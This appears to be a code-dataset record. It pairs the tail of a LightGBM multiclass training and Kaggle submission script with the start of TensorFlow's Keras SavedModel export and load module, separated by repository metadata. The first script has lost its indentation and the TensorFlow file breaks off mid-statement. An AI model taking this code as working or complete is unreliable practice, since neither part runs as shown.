param = {
'objective': 'multiclass',
'num_class': 14,
'metric': 'multi_logloss',
'learning_rate': 0.01,
'max_depth': 6,
'num_leaves': 63,
'max_bin': 255,
'min_child_weight': 10,
'min_data_in_leaf': 150,
'reg_lambda': 0.5, # L2 regularization term on weights.
'reg_alpha': 0.5, # L1 regularization term on weights.
'colsample_bytree': 0.5,
'subsample': 0.5,
# 'nthread': 32,
'nthread': cpu_count(),
'bagging_freq': 1,
'verbose':-1,
}
# =============================================================================
# load
# =============================================================================
files_tr = sorted(glob('../data/train_f*.pkl'))
[print(f) for f in files_tr]
X = pd.concat([
pd.read_pickle(f) for f in tqdm(files_tr, mininterval=60)
], axis=1)
y = utils.load_target().target
X.drop(DROP, axis=1, inplace=True)
target_dict = {}
target_dict_r = {}
for i,e in enumerate(y.sort_values().unique()):
target_dict[e] = i
target_dict_r[i] = e
y = y.replace(target_dict)
if X.columns.duplicated().sum()>0:
raise Exception(f'duplicated!: { X.columns[X.columns.duplicated()] }')
print('no dup :) ')
print(f'X.shape {X.shape}')
gc.collect()
COL = X.columns.tolist()
#CAT = list( set(X.columns)&set(utils_cat.ALL))
#print(f'CAT: {CAT}')
# =============================================================================
# cv
# =============================================================================
dtrain = lgb.Dataset(X, y, #categorical_feature=CAT,
free_raw_data=False)
gc.collect()
model_all = []
nround_mean = 0
wloss_list = []
for i in range(LOOP):
gc.collect()
param['seed'] = np.random.randint(9999)
ret, models = lgb.cv(param, dtrain, 99999, nfold=NFOLD,
feval=utils.lgb_multi_weighted_logloss,
early_stopping_rounds=100, verbose_eval=50,
seed=SEED)
model_all += models
nround_mean += len(ret['multi_logloss-mean'])
wloss_list.append( ret['wloss-mean'][-1] )
nround_mean = int((nround_mean/LOOP) * 1.3)
result = f"CV wloss: {np.mean(wloss_list)} + {np.std(wloss_list)}"
print(result)
imp = ex.getImp(model_all)
imp['split'] /= imp['split'].max()
imp['gain'] /= imp['gain'].max()
imp['total'] = imp['split'] + imp['gain']
imp.sort_values('total', ascending=False, inplace=True)
imp.reset_index(drop=True, inplace=True)
imp.to_csv(f'LOG/imp_{__file__}.csv', index=False)
png = f'LOG/imp_{__file__}.png'
utils.savefig_imp(imp, png, x='total', title=f'{__file__}')
utils.send_line(result, png)
COL = imp[imp.gain>0].feature.tolist()
# =============================================================================
# model
# =============================================================================
dtrain = lgb.Dataset(X[COL], y, #categorical_feature=CAT,
free_raw_data=False)
gc.collect()
np.random.seed(SEED)
model_all = []
for i in range(LOOP):
print('building', i)
gc.collect()
param['seed'] = np.random.randint(9999)
model = lgb.train(param, dtrain, num_boost_round=nround_mean, valid_sets=None,
valid_names=None, fobj=None, feval=None, init_model=None,
feature_name='auto', categorical_feature='auto',
early_stopping_rounds=None, evals_result=None,
verbose_eval=True, learning_rates=None,
keep_training_booster=False, callbacks=None)
model_all.append(model)
del dtrain, X; gc.collect()
# =============================================================================
# test
# =============================================================================
files_te = sorted(glob('../data/test_f*.pkl'))
X_test = pd.concat([
pd.read_pickle(f) for f in tqdm(files_te, mininterval=60)
], axis=1)[COL]
for i,model in enumerate(tqdm(model_all)):
y_pred = model.predict(X_test)
if i==0:
y_pred_all = y_pred
else:
y_pred_all += y_pred
y_pred_all /= len(model_all)
sub = pd.read_csv('../input/sample_submission.csv.zip')
df = pd.DataFrame(y_pred_all, columns=sub.columns[1:-1])
# Compute preds_99 as the proba of class not being any of the others
# preds_99 = 0.1 gives 1.769
preds_99 = np.ones(df.shape[0])
for i in range(df.shape[1]):
preds_99 *= (1 - df.iloc[:, i])
df['class_99'] = preds_99
sub = pd.concat([sub[['object_id']], df], axis=1)
sub.to_csv(SUBMIT_FILE_PATH, index=False, compression='gzip')
sub.iloc[:, 1:].hist(bins=30, figsize=(16, 12))
png = f'LOG/sub_{__file__}.png'
utils.savefig_sub(sub, png)
utils.send_line('DONE!', png)
# =============================================================================
# submission
# =============================================================================
if EXE_SUBMIT:
print('submit')
utils.submit(SUBMIT_FILE_PATH, COMMENT)
#==============================================================================
utils.end(__file__)
utils.stop_instance()
| [
"kazuki.onodera@dena.com"
] | kazuki.onodera@dena.com |
32fdd1f1965526ea32fe436729d26b79174c6fb1 | 6097ddb284046a0fe8fd351e3bc792bec062b751 | /tensorflow/python/keras/saving/saved_model.py | def4f21f1e0f5a88e2f5ce79acaae89b1e128424 | [
"Apache-2.0"
] | permissive | siju-samuel/tensorflow | 5f09a0b263e0d8cb2fc2b0af22ed8093315deb28 | 0ac663d9a78ab2c630173fd7b0cc63fedf1526e2 | refs/heads/master | 2022-10-29T20:54:50.896917 | 2019-09-30T05:05:17 | 2019-09-30T05:05:17 | 129,046,287 | 0 | 0 | Apache-2.0 | 2022-10-04T23:45:00 | 2018-04-11T06:37:07 | C++ | UTF-8 | Python | false | false | 62,507 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions to save/load keras Model to/from SavedModel."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import json
import os
import weakref
import six
from tensorflow.python.client import session
from tensorflow.python.eager import def_function
from tensorflow.python.eager import function as defun
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import optimizers
from tensorflow.python.keras import regularizers
from tensorflow.python.keras.engine import base_layer_utils
from tensorflow.python.keras.engine import input_spec
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.keras.saving import model_from_json
from tensorflow.python.keras.saving import saving_utils
from tensorflow.python.keras.utils import mode_keys
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.io_utils import ask_to_proceed_with_overwrite
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import builder as saved_model_builder
from tensorflow.python.saved_model import constants
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import model_utils
from tensorflow.python.saved_model import save as save_lib
from tensorflow.python.saved_model import utils_impl as saved_model_utils
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training.tracking import base as trackable
from tensorflow.python.training.tracking import data_structures
from tensorflow.python.training.tracking import graph_view
from tensorflow.python.training.tracking import layer_utils as trackable_layer_utils
from tensorflow.python.training.tracking.tracking import AutoTrackable
from tensorflow.python.training.tracking.tracking import delete_tracking
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util.lazy_loader import LazyLoader
from tensorflow.python.util.tf_export import keras_export
# To avoid circular dependencies between keras/engine and keras/saving,
# code in keras/saving must delay imports.
# TODO(b/134426265): Switch back to single-quotes to match the rest of the file
# once the issue with copybara is fixed.
# NOTE(review): LazyLoader presumably defers the real module import until first
# attribute access -- confirm against tensorflow.python.util.lazy_loader.
# pylint:disable=g-inconsistent-quotes
metrics_lib = LazyLoader("metrics_lib", globals(),
                         "tensorflow.python.keras.metrics")
models_lib = LazyLoader("models_lib", globals(),
                        "tensorflow.python.keras.models")
base_layer = LazyLoader(
    "base_layer", globals(),
    "tensorflow.python.keras.engine.base_layer")
network_lib = LazyLoader(
    "network_lib", globals(),
    "tensorflow.python.keras.engine.network")
sequential = LazyLoader(
    "sequential", globals(),
    "tensorflow.python.keras.engine.sequential")
training_lib = LazyLoader(
    "training_lib", globals(),
    "tensorflow.python.keras.engine.training")
input_layer = LazyLoader(
    "input_layer", globals(),
    "tensorflow.python.keras.engine.input_layer")
# pylint:enable=g-inconsistent-quotes
@deprecation.deprecated(
    date=None,
    instructions=('Please use `model.save(..., save_format="tf")` or '
                  '`tf.keras.models.save_model(..., save_format="tf")`.'))
@keras_export('keras.experimental.export_saved_model')
def export_saved_model(model,
                       saved_model_path,
                       custom_objects=None,
                       as_text=False,
                       input_signature=None,
                       serving_only=False):
  """Exports a `tf.keras.Model` as a Tensorflow SavedModel.

  Note that at this time, subclassed models can only be saved using
  `serving_only=True`.

  The exported SavedModel is a standalone serialization of TensorFlow objects
  supported by the TF language APIs and TensorFlow Serving. Reload it with
  `tf.keras.experimental.load_from_saved_model`. It bundles:

  1. a checkpoint with the model weights;
  2. a SavedModel proto with the backend graphs for prediction (serving) and,
     when the model is compiled, train and evaluation;
  3. the model's json config, when `get_config()` is defined.

  Example:

  ```python
  import tensorflow as tf

  model = tf.keras.Sequential()
  model.add(tf.keras.layers.Dense(1, input_shape=[10]))

  path = '/tmp/simple_keras_model'
  tf.keras.experimental.export_saved_model(model, path)
  new_model = tf.keras.experimental.load_from_saved_model(path)
  ```

  Args:
    model: A `tf.keras.Model` to be saved. Subclassed models require
      `serving_only=True`.
    saved_model_path: a string specifying the path to the SavedModel directory.
    custom_objects: Optional dictionary mapping string names to custom classes
      or functions (e.g. custom loss functions).
    as_text: bool, `False` by default. Whether to write the SavedModel proto in
      text format. Currently unavailable in serving-only mode.
    input_signature: A possibly nested sequence of `tf.TensorSpec` objects,
      used to specify the expected model inputs. See `tf.function`.
    serving_only: bool, `False` by default. When true, only the prediction
      graph is saved.

  Raises:
    NotImplementedError: If the model is subclassed and `serving_only` is
      False.
    ValueError: If the input signature cannot be inferred from the model.
    AssertionError: If the SavedModel directory already exists and isn't empty.
  """
  if not serving_only:
    # Full v1-format export: serving graph plus (if compiled) train/eval.
    _save_v1_format(model, saved_model_path, custom_objects, as_text,
                    input_signature)
  else:
    signatures = saving_utils.trace_model_call(model, input_signature)
    save_lib.save(model, saved_model_path, signatures=signatures)

  # Best-effort: the json config only exists when get_config() is defined.
  try:
    _export_model_json(model, saved_model_path)
  except NotImplementedError:
    logging.warning('Skipped saving model JSON, subclassed model does not have '
                    'get_config() defined.')
def _export_model_json(model, saved_model_path):
  """Writes the model's JSON config into the SavedModel assets directory."""
  assets_dir = saved_model_utils.get_or_create_assets_dir(saved_model_path)
  json_path = os.path.join(
      assets_dir, compat.as_text(constants.SAVED_MODEL_FILENAME_JSON))
  file_io.write_string_to_file(json_path, model.to_json())
def _export_model_variables(model, saved_model_path):
  """Writes the model weights as a TF-format checkpoint under variables/.

  Returns:
    The checkpoint path prefix that the weights were written to.
  """
  # Make sure the variables directory exists before writing the checkpoint.
  saved_model_utils.get_or_create_variables_dir(saved_model_path)
  prefix = saved_model_utils.get_variables_path(saved_model_path)
  model.save_weights(prefix, overwrite=True, save_format='tf')
  return prefix
def _save_v1_format(model, path, custom_objects, as_text, input_signature):
  """Exports model to v1 SavedModel format.

  Args:
    model: A `tf.keras.Model`. Subclassed models (other than built
      `Sequential` models) are rejected here; they can only be exported with
      `serving_only=True`.
    path: String path to the SavedModel directory.
    custom_objects: Optional dictionary mapping string names to custom classes
      or functions.
    as_text: Whether to write the SavedModel proto in text format.
    input_signature: Possibly nested sequence of `tf.TensorSpec`s describing
      the expected inputs, or `None` to infer them from the model.

  Raises:
    ValueError: If a Sequential model's weights have not been created yet.
    NotImplementedError: If `model` is a subclassed (non-graph-network) model
      that is not a Sequential model.
  """
  if not model._is_graph_network:  # pylint: disable=protected-access
    if isinstance(model, sequential.Sequential):
      # If input shape is not directly set in the model, the exported model
      # will infer the expected shapes of the input from the model.
      if not model.built:
        raise ValueError('Weights for sequential model have not yet been '
                         'created. Weights are created when the Model is first '
                         'called on inputs or `build()` is called with an '
                         '`input_shape`, or the first layer in the model has '
                         '`input_shape` during construction.')
      # TODO(kathywu): Build the model with input_signature to create the
      # weights before _export_model_variables().
    else:
      raise NotImplementedError(
          'Subclassed models can only be exported for serving. Please set '
          'argument serving_only=True.')
  builder = saved_model_builder._SavedModelBuilder(path)  # pylint: disable=protected-access
  # Manually save variables to export them in an object-based checkpoint. This
  # skips the `builder.add_meta_graph_and_variables()` step, which saves a
  # named-based checkpoint.
  # TODO(b/113134168): Add fn to Builder to save with object-based saver.
  # TODO(b/113178242): This should only export the model json structure. Only
  # one save is needed once the weights can be copied from the model to clone.
  checkpoint_path = _export_model_variables(model, path)
  # Export each mode. Use ModeKeys enums defined for `Estimator` to ensure that
  # Keras models and `Estimator`s are exported with the same format.
  # Every time a mode is exported, the code checks to see if new variables have
  # been created (e.g. optimizer slot variables). If that is the case, the
  # checkpoint is re-saved to include the new variables.
  export_args = {'builder': builder,
                 'model': model,
                 'custom_objects': custom_objects,
                 'checkpoint_path': checkpoint_path,
                 'input_signature': input_signature}
  has_saved_vars = False
  if model.optimizer:
    # Train/eval graphs can only be exported for optimizers the exporter knows
    # how to clone (Keras-native TFOptimizer wrapper or OptimizerV2).
    if isinstance(model.optimizer, (optimizers.TFOptimizer,
                                    optimizer_v2.OptimizerV2)):
      _export_mode(mode_keys.ModeKeys.TRAIN, has_saved_vars, **export_args)
      has_saved_vars = True
      _export_mode(mode_keys.ModeKeys.TEST, has_saved_vars, **export_args)
    else:
      logging.warning(
          'Model was compiled with an optimizer, but the optimizer is not from '
          '`tf.train` (e.g. `tf.train.AdagradOptimizer`). Only the serving '
          'graph was exported. The train and evaluate graphs were not added to '
          'the SavedModel.')
  # The serving (PREDICT) graph is always exported last.
  _export_mode(mode_keys.ModeKeys.PREDICT, has_saved_vars, **export_args)
  builder.save(as_text)
def _get_var_list(model):
  """Collects every checkpointed saveable object reachable from `model`."""
  view = graph_view.ObjectGraphView(model)
  # serialize_object_graph returns a 3-tuple; only the first element (the
  # list of saveable objects) is needed here.
  serialized = view.serialize_object_graph()
  return serialized[0]
def create_placeholder(spec):
  """Builds a Keras backend placeholder mirroring the given TensorSpec."""
  shape, dtype, name = spec.shape, spec.dtype, spec.name
  return K.placeholder(shape=shape, dtype=dtype, name=name)
def _export_mode(
    mode, has_saved_vars, builder, model, custom_objects, checkpoint_path,
    input_signature):
  """Exports a model, and optionally saves new vars from the clone model.

  Args:
    mode: A `tf.estimator.ModeKeys` string.
    has_saved_vars: A `boolean` indicating whether the SavedModel has already
      exported variables.
    builder: A `SavedModelBuilder` object.
    model: A `tf.keras.Model` object.
    custom_objects: A dictionary mapping string names to custom classes
      or functions.
    checkpoint_path: String path to checkpoint.
    input_signature: Nested TensorSpec containing the expected inputs. Can be
      `None`, in which case the signature will be inferred from the model.

  Raises:
    ValueError: If the train/eval mode is being exported, but the model does
      not have an optimizer.
  """
  # Only the PREDICT graph can be exported without compiling the clone.
  compile_clone = (mode != mode_keys.ModeKeys.PREDICT)
  if compile_clone and not model.optimizer:
    raise ValueError(
        'Model does not have an optimizer. Cannot export mode %s' % mode)
  model_graph = ops.get_default_graph()
  # Build the cloned graph in a fresh Graph, with the learning phase fixed to
  # whether this is the TRAIN export.
  with ops.Graph().as_default() as g, K.learning_phase_scope(
      mode == mode_keys.ModeKeys.TRAIN):
    if input_signature is None:
      input_tensors = None
    else:
      input_tensors = nest.map_structure(create_placeholder, input_signature)
    # Clone the model into blank graph. This will create placeholders for inputs
    # and targets.
    clone = models_lib.clone_and_build_model(
        model, input_tensors=input_tensors, custom_objects=custom_objects,
        compile_clone=compile_clone)
    # Make sure that iterations variable is added to the global step collection,
    # to ensure that, when the SavedModel graph is loaded, the iterations
    # variable is returned by `tf.compat.v1.train.get_global_step()`. This is
    # required for compatibility with the SavedModelEstimator.
    if compile_clone:
      g.add_to_collection(ops.GraphKeys.GLOBAL_STEP, clone.optimizer.iterations)
    # Extract update and train ops from train/test/predict functions.
    train_op = None
    if mode == mode_keys.ModeKeys.TRAIN:
      clone._make_train_function()  # pylint: disable=protected-access
      train_op = clone.train_function.updates_op
    elif mode == mode_keys.ModeKeys.TEST:
      clone._make_test_function()  # pylint: disable=protected-access
    else:
      clone._make_predict_function()  # pylint: disable=protected-access
    g.get_collection_ref(ops.GraphKeys.UPDATE_OPS).extend(clone.state_updates)
    with session.Session().as_default():
      clone_var_list = _get_var_list(clone)
      if has_saved_vars:
        # Confirm all variables in the clone have an entry in the checkpoint.
        status = clone.load_weights(checkpoint_path)
        status.assert_existing_objects_matched()
      else:
        # Confirm that variables between the clone and model match up exactly,
        # not counting optimizer objects. Optimizer objects are ignored because
        # if the model has not trained, the slot variables will not have been
        # created yet.
        # TODO(b/113179535): Replace with trackable equivalence.
        _assert_same_non_optimizer_objects(model, model_graph, clone, g)
        # TODO(b/113178242): Use value transfer for trackable objects.
        clone.load_weights(checkpoint_path)
        # Add graph and variables to SavedModel.
        # TODO(b/113134168): Switch to add_meta_graph_and_variables.
        clone.save_weights(checkpoint_path, save_format='tf', overwrite=True)
        builder._has_saved_variables = True  # pylint: disable=protected-access
      # Add graph to the SavedModel builder.
      builder.add_meta_graph(
          model_utils.EXPORT_TAG_MAP[mode],
          signature_def_map=_create_signature_def_map(clone, mode),
          saver=saver_lib.Saver(
              clone_var_list,
              # Allow saving Models with no variables. This is somewhat odd, but
              # it's not necessarily a bug.
              allow_empty=True),
          init_op=variables.local_variables_initializer(),
          train_op=train_op)
    return None
def _create_signature_def_map(model, mode):
  """Creates a SignatureDef map from a Keras model.

  Args:
    model: A `tf.keras.Model` (the clone built in the export graph).
    mode: A `tf.estimator.ModeKeys` string.

  Returns:
    A map of signature names to `SignatureDef`s covering the model's inputs,
    targets (only when an optimizer is present), outputs, loss and metrics.
  """
  inputs_dict = {name: x for name, x in zip(model.input_names, model.inputs)}
  if model.optimizer:
    # Target placeholders are only created for compiled models; key them by
    # tensor name without the output index suffix.
    targets_dict = {x.name.split(':')[0]: x
                    for x in model._targets if x is not None}  # pylint: disable=protected-access
    inputs_dict.update(targets_dict)
  outputs_dict = {name: x
                  for name, x in zip(model.output_names, model.outputs)}
  metrics = saving_utils.extract_model_metrics(model)
  # Add metric variables to the `LOCAL_VARIABLES` collection. Metric variables
  # are by default not added to any collections. We are doing this here, so
  # that metric variables get initialized.
  local_vars = set(ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES))
  vars_to_add = set()
  if metrics is not None:
    for key, value in six.iteritems(metrics):
      if isinstance(value, metrics_lib.Metric):
        vars_to_add.update(value.variables)
        # Convert Metric instances to (value_tensor, update_op) tuple.
        metrics[key] = (value.result(), value.updates[0])
  # Remove variables that are in the local variables collection already.
  vars_to_add = vars_to_add.difference(local_vars)
  for v in vars_to_add:
    ops.add_to_collection(ops.GraphKeys.LOCAL_VARIABLES, v)
  export_outputs = model_utils.export_outputs_for_mode(
      mode,
      predictions=outputs_dict,
      loss=model.total_loss if model.optimizer else None,
      metrics=metrics)
  return model_utils.build_all_signature_defs(
      inputs_dict,
      export_outputs=export_outputs,
      serving_only=(mode == mode_keys.ModeKeys.PREDICT))
def _assert_same_non_optimizer_objects(model, model_graph, clone, clone_graph): # pylint: disable=unused-argument
"""Asserts model and clone contain the same trackable objects."""
# TODO(fchollet, kathywu): make sure this works in eager mode.
return True
@deprecation.deprecated(
    date=None,
    instructions=('The experimental save and load functions have been  '
                  'deprecated. Please switch to `tf.keras.models.load_model`.'))
@keras_export('keras.experimental.load_from_saved_model')
def load_from_saved_model(saved_model_path, custom_objects=None):
  """Loads a keras Model from a SavedModel created by `export_saved_model()`.

  The model state is reinstantiated in two steps: the topology is rebuilt from
  the json config stored under assets/, then the weights are restored from the
  checkpoint stored under variables/.

  Example:

  ```python
  import tensorflow as tf

  model = tf.keras.Sequential()
  model.add(tf.keras.layers.Dense(1, input_shape=[10]))

  path = '/tmp/simple_keras_model'
  tf.keras.experimental.export_saved_model(model, path)
  new_model = tf.keras.experimental.load_from_saved_model(path)
  ```

  Args:
    saved_model_path: a string specifying the path to an existing SavedModel.
    custom_objects: Optional dictionary mapping names (strings) to custom
      classes or functions to be considered during deserialization.

  Returns:
    a keras.Model instance.
  """
  # Rebuild the architecture from the json config under assets/.
  json_path = os.path.join(
      compat.as_bytes(saved_model_path),
      compat.as_bytes(constants.ASSETS_DIRECTORY),
      compat.as_bytes(constants.SAVED_MODEL_FILENAME_JSON))
  config = file_io.read_file_to_string(json_path)
  restored = model_from_json(config, custom_objects=custom_objects)

  # Restore the weights from the checkpoint under variables/.
  weights_prefix = os.path.join(
      compat.as_text(saved_model_path),
      compat.as_text(constants.VARIABLES_DIRECTORY),
      compat.as_text(constants.VARIABLES_FILENAME))
  restored.load_weights(weights_prefix)
  return restored
################################################################################
# Functional Style/V2 SavedModel functions                                     #
################################################################################
# All serialized attributes are listed within SerializedAttributes classes. See
# the docstring in SerializedAttributes for more context.
# All attributes are saved under the 'keras_api' namespace. Only common
# endpoints are attached directly to the root object.
_KERAS_ATTR = 'keras_api'
# Key into the serialization cache: maps to the per-save dict
# {Layer --> SerializedAttributes object} shared by all objects being saved.
_KERAS_CACHE_KEY = 'keras_serialized_attributes'
class SerializedAttributes(object):
  """Class that tracks and validates all serialization attributes.

  Keras models contain many Python-defined components. For example, the
  trainable_variable property lists the model's trainable variables by
  recursively retrieving the trainable variables from each of the child layers.
  Another example is model.call, a python function that calls child layers and
  adds ops to the backend graph.

  Only Tensorflow checkpointable objects and functions can be serialized to
  SavedModel. Serializing a Keras model as-is results in a checkpointable object
  that does not resemble a Keras model at all. Thus, extra checkpointable
  objects and functions must be created during serialization.

  **Defining new serialized attributes**
  Child classes should be defined using:
    SerializedAttributes.with_attributes(
        'name', checkpointable_objects=[...], functions=[...], copy_from=[...])
  This class is used to cache generated checkpointable objects and functions,
  ensuring that new objects and functions are generated a single time.

  **Usage during serialization**
  Each Layer/Model object should have a corresponding instance of
  SerializedAttributes. Create a new instance by calling
  `SerializedAttributes.new(obj)`. Objects and functions may be saved using
  `.set_and_validate_checkpointable_objects`/`.set_and_validate_functions`.
  The properties `.checkpointable_objects` and `.functions` returns the cached
  values.

  **Adding/changing attributes to save to SavedModel**
  1. Change the call to `SerializedAttributes.with_attributes` in the correct
     class:
     - CommonEndpoints: Base attributes to be added during serialization. If
       these attributes are present in a Trackable object, it can be
       deserialized to a Keras Model.
     - LayerAttributes: Attributes to serialize for Layer objects.
     - ModelAttributes: Attributes to serialize for Model objects.
  2. Update class docstring
  3. Update arguments to any calls to `set_and_validate_*`. For example, if
     `call_raw_tensors` is added to the ModelAttributes function list, then
     a `call_raw_tensors` function should be passed to
     `set_and_validate_functions`.

  **Common endpoints vs other attributes**
  Only common endpoints are attached directly to the root object. Keras-specific
  attributes are saved to a separate trackable object with the name "keras_api".
  The number of objects attached to the root is limited because any naming
  conflicts will cause user code to break.

  Another reason is that this will only affect users who call
  `tf.saved_model.load` instead of `tf.keras.models.load_model`. These are
  advanced users who are likely to have defined their own tf.functions and
  trackable objects. The added Keras-specific attributes are kept out of the way
  in the "keras_api" namespace.

  Properties defined in this class may be used to filter out keras-specific
  attributes:
  - `functions_to_serialize`: Returns dict of functions to attach to the root
    object.
  - `checkpointable_objects_to_serialize`: Returns dict of objects to attach to
    the root object (including separate trackable object containing
    keras-specific attributes)

  All changes to the serialized attributes must be backwards-compatible, so
  attributes should not be removed or modified without sufficient justification.
  """

  @staticmethod
  def with_attributes(
      name, checkpointable_objects=None, functions=None, copy_from=None):
    """Creates a subclass with all attributes as specified in the arguments.

    Args:
      name: Name of subclass
      checkpointable_objects: List of checkpointable objects to be serialized
        in the SavedModel.
      functions: List of functions to be serialized in the SavedModel.
      copy_from: List of other SerializedAttributes subclasses. The returned
        class will copy checkpoint objects/functions from each subclass.

    Returns:
      Child class with attributes as defined in the `checkpointable_objects`
      and `functions` lists.
    """
    # Copy the input lists so that extending them below (when `copy_from` is
    # set) cannot mutate lists owned by the caller.
    checkpointable_objects = list(checkpointable_objects or [])
    functions = list(functions or [])
    if copy_from is not None:
      for cls in copy_from:
        checkpointable_objects.extend(cls.all_checkpointable_objects)
        functions.extend(cls.all_functions)
    classdict = {
        'all_checkpointable_objects': set(checkpointable_objects),
        'all_functions': set(functions)}
    return type(name, (SerializedAttributes,), classdict)

  @staticmethod
  def new(obj):
    """Returns a new SerializedAttributes instance matching the object type."""
    if isinstance(obj, training_lib.Model):
      return ModelAttributes()
    elif isinstance(obj, base_layer.Layer):
      return LayerAttributes()
    else:
      raise TypeError('Internal error during serialization: Expected Keras '
                      'Layer object, got {} of type {}'.format(obj, type(obj)))

  def __init__(self):
    self._object_dict = {}
    self._function_dict = {}
    # Trackable container that holds all Keras-specific attributes; attached
    # to the root object under the 'keras_api' namespace.
    self._keras_trackable = AutoTrackable()

  @property
  def functions(self):
    """Returns dictionary of all functions."""
    return {key: value for key, value in self._function_dict.items()
            if value is not None}

  @property
  def checkpointable_objects(self):
    """Returns dictionary of all checkpointable objects."""
    return {key: value for key, value in self._object_dict.items()
            if value is not None}

  @property
  def functions_to_serialize(self):
    """Returns functions to attach to the root object during serialization."""
    return {key: value for key, value in self.functions.items()
            if key in CommonEndpoints.all_functions}

  @property
  def objects_to_serialize(self):
    """Returns objects to attach to the root object during serialization."""
    objects = {key: value for key, value in self.checkpointable_objects.items()
               if key in CommonEndpoints.all_checkpointable_objects}
    objects[_KERAS_ATTR] = self._keras_trackable
    return objects

  def set_and_validate_functions(self, function_dict):
    """Saves function dictionary, and validates dictionary values."""
    for key in self.all_functions:
      if key in function_dict:
        if (function_dict[key] is not None and  # Not all functions are required
            not isinstance(function_dict[key],
                           (defun.Function, def_function.Function))):
          raise ValueError(
              'Function dictionary contained a non-function object: {} (for key'
              ' {})'.format(function_dict[key], key))
        self._function_dict[key] = function_dict[key]
        setattr(self._keras_trackable, key, function_dict[key])
      else:
        raise ValueError('Function {} missing from serialized function dict.'
                         .format(key))
    return self.functions

  def set_and_validate_objects(self, object_dict):
    """Saves objects to a dictionary, and validates the values."""
    for key in self.all_checkpointable_objects:
      if key in object_dict:
        if not isinstance(object_dict[key], trackable.Trackable):
          raise ValueError(
              'Object dictionary contained a non-trackable object: {} (for key'
              ' {})'.format(object_dict[key], key))
        self._object_dict[key] = object_dict[key]
        setattr(self._keras_trackable, key, object_dict[key])
      else:
        # Bug fix: the original message was never formatted with the missing
        # key, so the error always printed a literal '{}'.
        raise ValueError('Object {} missing from serialized object dict.'
                         .format(key))
    return self.checkpointable_objects
class CommonEndpoints(SerializedAttributes.with_attributes(
    'CommonEndpoints',
    checkpointable_objects=['variables', 'trainable_variables',
                            'regularization_losses'],
    functions=['__call__', 'call_and_return_all_conditional_losses',
               '_default_save_signature'])):
  """Common endpoints shared by all models loadable by Keras.

  Attributes:
    variables: Every variable in the model and its sublayers.
    trainable_variables: Every trainable variable in the model and its
      sublayers.
    regularization_losses: Every unconditional loss (a loss that does not
      depend on the inputs) in the model and its sublayers.
    __call__: Function mapping inputs to the outputs of the model call
      function.
    call_and_return_all_conditional_losses: Function returning a tuple of
      (call function outputs, list of all losses that depend on the inputs).
    _default_save_signature: Traced model call function; present only when the
      top-level exported object is a Keras model.
  """
class LayerAttributes(SerializedAttributes.with_attributes(
    'LayerAttributes',
    checkpointable_objects=['non_trainable_variables', 'layers', 'metrics',
                            'layer_regularization_losses'],
    functions=['call_and_return_conditional_losses', 'activity_regularizer_fn'],
    copy_from=[CommonEndpoints]
    )):
  """Layer checkpointable objects + functions saved to the SavedModel.

  In addition to everything inherited from CommonEndpoints:

  Attributes:
    non_trainable_variables: Non-trainable variables in the layer and its
      sublayers.
    layers: All sublayers.
    metrics: All metrics in the layer and its sublayers.
    call_and_return_conditional_losses: Function mapping inputs to a tuple of
      (call function outputs, list of input-dependent losses). The activity
      regularizer loss is excluded from this list so that a deserialized Layer
      can substitute a different activity regularizer.
    activity_regularizer_fn: Callable returning the activity regularizer loss.
    layer_regularization_losses: Losses owned only by this layer.
  """
class ModelAttributes(SerializedAttributes.with_attributes(
    'ModelAttributes',
    copy_from=[LayerAttributes])):
  """Model checkpointable objects + functions saved to the SavedModel.

  Models are serialized with every attribute from LayerAttributes (which in
  turn includes all CommonEndpoints attributes); no additional model-specific
  attributes are defined yet.
  """
  # TODO(kathywu): Add attributes `compile_losses` and `compile_metrics`, which
  # list all losses and metrics defined by `model.compile`.
def serialize_all_attributes(layer, serialization_cache):
  """Serialize all attributes in the layer.

  Args:
    layer: Keras Layer or Model object.
    serialization_cache: Dictionary shared between all objects during
      serialization. Used to memoize one SerializedAttributes per layer and to
      detect whether `layer` is the root object of this save.

  Returns:
    A SerializedAttributes object for `layer`. It is left unpopulated when
    serialization is skipped (inputs not defined / layer not built) or when
    tracing the layer functions fails.
  """
  save_model_default_signature = False
  if _KERAS_CACHE_KEY not in serialization_cache:
    keras_cache = serialization_cache[_KERAS_CACHE_KEY] = {}
    if isinstance(layer, training_lib.Model):
      # Only trace default signature if the root object is a Model. Since the
      # keras cache key is only created in this method, we know that the object
      # is root if the key does not yet exist in the cache.
      save_model_default_signature = True
  else:
    keras_cache = serialization_cache[_KERAS_CACHE_KEY]
  if layer in keras_cache:
    return keras_cache[layer]
  # Cache the (still empty) attributes before doing any work, so recursive
  # serialization of sublayers sees this layer as already in progress.
  serialized_attr = keras_cache[layer] = SerializedAttributes.new(layer)
  if _should_skip_serialization(layer):
    return serialized_attr
  function_dict = {}
  if save_model_default_signature:
    # For compatibility with the tf.Lite Converter, the default save signature
    # should be traced without nested calls to other wrapped functions.
    # TODO(kathywu): Investigate why having nested calls results in a stateful
    # function. Perhaps something to do with losses, which are traced in nested
    # calls but not in the flat call.
    function_dict['_default_save_signature'] = _default_save_signature(layer)
  else:
    function_dict['_default_save_signature'] = None
  object_dict = _wrap_layer_objects(layer, serialization_cache)
  try:
    function_dict.update(_wrap_layer_functions(layer, serialization_cache))
  except (ValueError, TypeError) as e:
    logging.warning('Skipping full serialization of object {}, because an '
